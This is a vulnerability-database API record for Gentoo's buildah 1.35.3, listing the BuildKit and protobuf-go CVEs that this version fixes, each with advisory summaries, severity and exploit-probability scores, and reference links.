Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:ebuild/app-containers/buildah@1.35.3
Typeebuild
Namespaceapp-containers
Namebuildah
Version1.35.3
Qualifiers
Subpath
Is_vulnerablefalse
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-9j8p-hqfn-q7bj
vulnerability_id VCID-9j8p-hqfn-q7bj
summary 
BuildKit vulnerable to possible host system access from mount stub cleaner
### Impact
A malicious BuildKit frontend or Dockerfile using `RUN --mount` could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system.

### Patches
The issue has been fixed in v0.12.5

### Workarounds
Avoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing `RUN --mount` feature.

### References
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23652.json
reference_id
reference_type
scores
0
value 7.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23652.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-23652
reference_id
reference_type
scores
0
value 0.05701
scoring_system epss
scoring_elements 0.90428
published_at 2026-04-21T12:55:00Z
1
value 0.05701
scoring_system epss
scoring_elements 0.9043
published_at 2026-04-18T12:55:00Z
2
value 0.05701
scoring_system epss
scoring_elements 0.90422
published_at 2026-04-12T12:55:00Z
3
value 0.05701
scoring_system epss
scoring_elements 0.90423
published_at 2026-04-11T12:55:00Z
4
value 0.05701
scoring_system epss
scoring_elements 0.90415
published_at 2026-04-13T12:55:00Z
5
value 0.05701
scoring_system epss
scoring_elements 0.90408
published_at 2026-04-08T12:55:00Z
6
value 0.05701
scoring_system epss
scoring_elements 0.90394
published_at 2026-04-07T12:55:00Z
7
value 0.05701
scoring_system epss
scoring_elements 0.9039
published_at 2026-04-04T12:55:00Z
8
value 0.05701
scoring_system epss
scoring_elements 0.90378
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-23652
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/moby/buildkit
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/moby/buildkit
4
reference_url https://github.com/moby/buildkit/pull/4603
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/
url https://github.com/moby/buildkit/pull/4603
5
reference_url https://github.com/moby/buildkit/releases/tag/v0.12.5
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/
url https://github.com/moby/buildkit/releases/tag/v0.12.5
6
reference_url https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/
url https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-23652
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-23652
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2262225
reference_id 2262225
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2262225
9
reference_url https://security.gentoo.org/glsa/202407-12
reference_id GLSA-202407-12
reference_type
scores
url https://security.gentoo.org/glsa/202407-12
10
reference_url https://security.gentoo.org/glsa/202407-25
reference_id GLSA-202407-25
reference_type
scores
url https://security.gentoo.org/glsa/202407-25
11
reference_url https://security.gentoo.org/glsa/202409-29
reference_id GLSA-202409-29
reference_type
scores
url https://security.gentoo.org/glsa/202409-29
12
reference_url https://usn.ubuntu.com/7474-1/
reference_id USN-7474-1
reference_type
scores
url https://usn.ubuntu.com/7474-1/
fixed_packages
0
url pkg:ebuild/app-containers/buildah@1.35.3
purl pkg:ebuild/app-containers/buildah@1.35.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3
aliases CVE-2024-23652, GHSA-4v98-7qmw-rqr8
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9j8p-hqfn-q7bj
1
url VCID-ba18-6srf-ufbu
vulnerability_id VCID-ba18-6srf-ufbu
summary 
BuildKit vulnerable to possible race condition with accessing subpaths from cache mounts
### Impact
Two malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container.

### Patches
The issue has been fixed in v0.12.5

### Workarounds
Avoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with `--mount=type=cache,source=...` options.

### References
https://www.openwall.com/lists/oss-security/2019/05/28/1
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23651.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23651.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-23651
reference_id
reference_type
scores
0
value 0.00548
scoring_system epss
scoring_elements 0.67923
published_at 2026-04-21T12:55:00Z
1
value 0.00548
scoring_system epss
scoring_elements 0.67942
published_at 2026-04-18T12:55:00Z
2
value 0.00548
scoring_system epss
scoring_elements 0.67929
published_at 2026-04-16T12:55:00Z
3
value 0.00548
scoring_system epss
scoring_elements 0.67853
published_at 2026-04-07T12:55:00Z
4
value 0.00548
scoring_system epss
scoring_elements 0.67927
published_at 2026-04-12T12:55:00Z
5
value 0.00548
scoring_system epss
scoring_elements 0.67941
published_at 2026-04-11T12:55:00Z
6
value 0.00548
scoring_system epss
scoring_elements 0.67917
published_at 2026-04-09T12:55:00Z
7
value 0.00548
scoring_system epss
scoring_elements 0.67903
published_at 2026-04-08T12:55:00Z
8
value 0.00548
scoring_system epss
scoring_elements 0.67872
published_at 2026-04-04T12:55:00Z
9
value 0.00548
scoring_system epss
scoring_elements 0.67891
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-23651
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/moby/buildkit
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/moby/buildkit
4
reference_url https://github.com/moby/buildkit/pull/4604
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/
url https://github.com/moby/buildkit/pull/4604
5
reference_url https://github.com/moby/buildkit/releases/tag/v0.12.5
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/
url https://github.com/moby/buildkit/releases/tag/v0.12.5
6
reference_url https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/
url https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-23651
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-23651
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2262224
reference_id 2262224
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2262224
9
reference_url https://security.gentoo.org/glsa/202407-12
reference_id GLSA-202407-12
reference_type
scores
url https://security.gentoo.org/glsa/202407-12
10
reference_url https://security.gentoo.org/glsa/202407-25
reference_id GLSA-202407-25
reference_type
scores
url https://security.gentoo.org/glsa/202407-25
11
reference_url https://security.gentoo.org/glsa/202409-29
reference_id GLSA-202409-29
reference_type
scores
url https://security.gentoo.org/glsa/202409-29
12
reference_url https://usn.ubuntu.com/7474-1/
reference_id USN-7474-1
reference_type
scores
url https://usn.ubuntu.com/7474-1/
fixed_packages
0
url pkg:ebuild/app-containers/buildah@1.35.3
purl pkg:ebuild/app-containers/buildah@1.35.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3
aliases CVE-2024-23651, GHSA-m3r6-h7wv-7xxv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ba18-6srf-ufbu
2
url VCID-dmsf-7cxm-xff5
vulnerability_id VCID-dmsf-7cxm-xff5
summary 
Buildkit's interactive containers API does not validate entitlements check
### Impact
In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.

### Patches
The issue has been fixed in v0.12.5 .

### Workarounds
Avoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command.

### References
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23653.json
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23653.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-23653
reference_id
reference_type
scores
0
value 0.10301
scoring_system epss
scoring_elements 0.93197
published_at 2026-04-18T12:55:00Z
1
value 0.10301
scoring_system epss
scoring_elements 0.93192
published_at 2026-04-16T12:55:00Z
2
value 0.10301
scoring_system epss
scoring_elements 0.93175
published_at 2026-04-12T12:55:00Z
3
value 0.10301
scoring_system epss
scoring_elements 0.93176
published_at 2026-04-13T12:55:00Z
4
value 0.10301
scoring_system epss
scoring_elements 0.93156
published_at 2026-04-02T12:55:00Z
5
value 0.10301
scoring_system epss
scoring_elements 0.9316
published_at 2026-04-04T12:55:00Z
6
value 0.10301
scoring_system epss
scoring_elements 0.93158
published_at 2026-04-07T12:55:00Z
7
value 0.10301
scoring_system epss
scoring_elements 0.93167
published_at 2026-04-08T12:55:00Z
8
value 0.10301
scoring_system epss
scoring_elements 0.93171
published_at 2026-04-09T12:55:00Z
9
value 0.10301
scoring_system epss
scoring_elements 0.93177
published_at 2026-04-11T12:55:00Z
10
value 0.1055
scoring_system epss
scoring_elements 0.93296
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-23653
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/moby/buildkit
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/moby/buildkit
4
reference_url https://github.com/moby/buildkit/commit/5026d95aa3336e97cfe46e3764f52d08bac7a10e
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/moby/buildkit/commit/5026d95aa3336e97cfe46e3764f52d08bac7a10e
5
reference_url https://github.com/moby/buildkit/commit/92cc595cfb12891d4b3ae476e067c74250e4b71e
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/moby/buildkit/commit/92cc595cfb12891d4b3ae476e067c74250e4b71e
6
reference_url https://github.com/moby/buildkit/pull/4602
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/
url https://github.com/moby/buildkit/pull/4602
7
reference_url https://github.com/moby/buildkit/releases/tag/v0.12.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/
url https://github.com/moby/buildkit/releases/tag/v0.12.5
8
reference_url https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/
url https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-23653
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-23653
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2262226
reference_id 2262226
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2262226
11
reference_url https://security.gentoo.org/glsa/202407-12
reference_id GLSA-202407-12
reference_type
scores
url https://security.gentoo.org/glsa/202407-12
12
reference_url https://security.gentoo.org/glsa/202407-25
reference_id GLSA-202407-25
reference_type
scores
url https://security.gentoo.org/glsa/202407-25
13
reference_url https://security.gentoo.org/glsa/202409-29
reference_id GLSA-202409-29
reference_type
scores
url https://security.gentoo.org/glsa/202409-29
fixed_packages
0
url pkg:ebuild/app-containers/buildah@1.35.3
purl pkg:ebuild/app-containers/buildah@1.35.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3
aliases CVE-2024-23653, GHSA-wr6v-9f75-vh2g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dmsf-7cxm-xff5
3
url VCID-f8ak-21d8-juff
vulnerability_id VCID-f8ak-21d8-juff
summary 
Golang protojson.Unmarshal function infinite loop when unmarshaling certain forms of invalid JSON
The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-24786
reference_id
reference_type
scores
0
value 0.00313
scoring_system epss
scoring_elements 0.54531
published_at 2026-04-18T12:55:00Z
1
value 0.00313
scoring_system epss
scoring_elements 0.54528
published_at 2026-04-16T12:55:00Z
2
value 0.00313
scoring_system epss
scoring_elements 0.5449
published_at 2026-04-13T12:55:00Z
3
value 0.00313
scoring_system epss
scoring_elements 0.54511
published_at 2026-04-12T12:55:00Z
4
value 0.00313
scoring_system epss
scoring_elements 0.54529
published_at 2026-04-11T12:55:00Z
5
value 0.00313
scoring_system epss
scoring_elements 0.54517
published_at 2026-04-09T12:55:00Z
6
value 0.00313
scoring_system epss
scoring_elements 0.54523
published_at 2026-04-08T12:55:00Z
7
value 0.00322
scoring_system epss
scoring_elements 0.55266
published_at 2026-04-02T12:55:00Z
8
value 0.00322
scoring_system epss
scoring_elements 0.5527
published_at 2026-04-07T12:55:00Z
9
value 0.00322
scoring_system epss
scoring_elements 0.55289
published_at 2026-04-04T12:55:00Z
10
value 0.00393
scoring_system epss
scoring_elements 0.60287
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-24786
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/protocolbuffers/protobuf-go
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/protocolbuffers/protobuf-go
5
reference_url https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023
6
reference_url https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0
7
reference_url https://go.dev/cl/569356
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/
url https://go.dev/cl/569356
8
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-24786
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-24786
10
reference_url https://pkg.go.dev/vuln/GO-2024-2611
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/
url https://pkg.go.dev/vuln/GO-2024-2611
11
reference_url https://security.netapp.com/advisory/ntap-20240517-0002
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20240517-0002
12
reference_url http://www.openwall.com/lists/oss-security/2024/03/08/4
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 6.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/
url http://www.openwall.com/lists/oss-security/2024/03/08/4
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684
reference_id 1065684
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2268046
reference_id 2268046
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2268046
15
reference_url https://security.gentoo.org/glsa/202407-12
reference_id GLSA-202407-12
reference_type
scores
url https://security.gentoo.org/glsa/202407-12
16
reference_url https://security.gentoo.org/glsa/202407-25
reference_id GLSA-202407-25
reference_type
scores
url https://security.gentoo.org/glsa/202407-25
17
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/
reference_id JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/
18
reference_url https://security.netapp.com/advisory/ntap-20240517-0002/
reference_id ntap-20240517-0002
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/
url https://security.netapp.com/advisory/ntap-20240517-0002/
19
reference_url https://access.redhat.com/errata/RHSA-2024:0040
reference_id RHSA-2024:0040
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:0040
20
reference_url https://access.redhat.com/errata/RHSA-2024:0043
reference_id RHSA-2024:0043
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:0043
21
reference_url https://access.redhat.com/errata/RHSA-2024:10852
reference_id RHSA-2024:10852
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:10852
22
reference_url https://access.redhat.com/errata/RHSA-2024:1362
reference_id RHSA-2024:1362
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1362
23
reference_url https://access.redhat.com/errata/RHSA-2024:1363
reference_id RHSA-2024:1363
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1363
24
reference_url https://access.redhat.com/errata/RHSA-2024:1456
reference_id RHSA-2024:1456
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1456
25
reference_url https://access.redhat.com/errata/RHSA-2024:1461
reference_id RHSA-2024:1461
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1461
26
reference_url https://access.redhat.com/errata/RHSA-2024:1474
reference_id RHSA-2024:1474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1474
27
reference_url https://access.redhat.com/errata/RHSA-2024:1507
reference_id RHSA-2024:1507
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1507
28
reference_url https://access.redhat.com/errata/RHSA-2024:1508
reference_id RHSA-2024:1508
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1508
29
reference_url https://access.redhat.com/errata/RHSA-2024:1537
reference_id RHSA-2024:1537
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1537
30
reference_url https://access.redhat.com/errata/RHSA-2024:1538
reference_id RHSA-2024:1538
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1538
31
reference_url https://access.redhat.com/errata/RHSA-2024:1616
reference_id RHSA-2024:1616
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1616
32
